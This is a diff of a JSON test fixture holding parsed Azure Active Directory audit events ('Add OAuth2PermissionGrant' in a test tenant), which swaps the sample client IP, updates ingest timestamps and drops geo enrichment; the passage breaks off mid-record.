@@ -18886,12 +17248,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036568400Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125361200Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;0
0000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":
\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -18917,25 +17279,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -18949,7 +17293,7 @@ "ObjectId": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -19085,7 +17429,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -19097,12 +17441,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036572300Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":
\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125367600Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;0
0000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":
\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft 
